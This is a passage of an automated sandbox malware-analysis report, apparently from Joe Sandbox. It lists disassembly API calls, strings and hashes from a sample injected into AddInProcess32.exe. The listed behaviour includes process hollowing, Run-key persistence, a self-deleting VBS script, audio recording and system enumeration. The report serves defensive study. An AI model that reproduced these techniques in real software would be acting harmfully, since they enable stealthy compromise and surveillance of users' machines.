                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 4188446516-3035715614
                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041C482: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-1447701601
                                                  • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                  • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                  • API String ID: 3797177996-2483056239
                                                  • Opcode ID: 54b64125b67377fc7bd1dcd8851340f67987214f4c55140a652dce6bd793e06d
                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                  • Opcode Fuzzy Hash: 54b64125b67377fc7bd1dcd8851340f67987214f4c55140a652dce6bd793e06d
                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                    • Part of subcall function 0041C482: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                  • API String ID: 2649220323-436679193
                                                  • Opcode ID: 3f7ca46582bafc1359089de8bf853bd67d8631f10b884e5080277a473ae5ea1d
                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                  • Opcode Fuzzy Hash: 3f7ca46582bafc1359089de8bf853bd67d8631f10b884e5080277a473ae5ea1d
                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                  • API String ID: 738084811-2094122233
                                                  • Opcode ID: daaf6aa407b0f67e838d4d06b283a77aaa77ba5fb1e4ad61ede289713d45d015
                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                  • Opcode Fuzzy Hash: daaf6aa407b0f67e838d4d06b283a77aaa77ba5fb1e4ad61ede289713d45d015
                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-4283035339
                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                  • _wcslen.LIBCMT ref: 0040D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open
                                                  • API String ID: 1579085052-1506045317
                                                  • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                  • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID:
                                                  • API String ID: 3899193279-0
                                                  • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                  • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                  • API String ID: 1223786279-2576077980
                                                  • Opcode ID: cb87e55037c87ccaed6e89a37fc3772aa02b4692071f73733422b9be8fcfd6d7
                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                  • Opcode Fuzzy Hash: cb87e55037c87ccaed6e89a37fc3772aa02b4692071f73733422b9be8fcfd6d7
                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                  • API String ID: 2490988753-744132762
                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  • API String ID: 1332880857-3714951968
                                                  • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                  • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
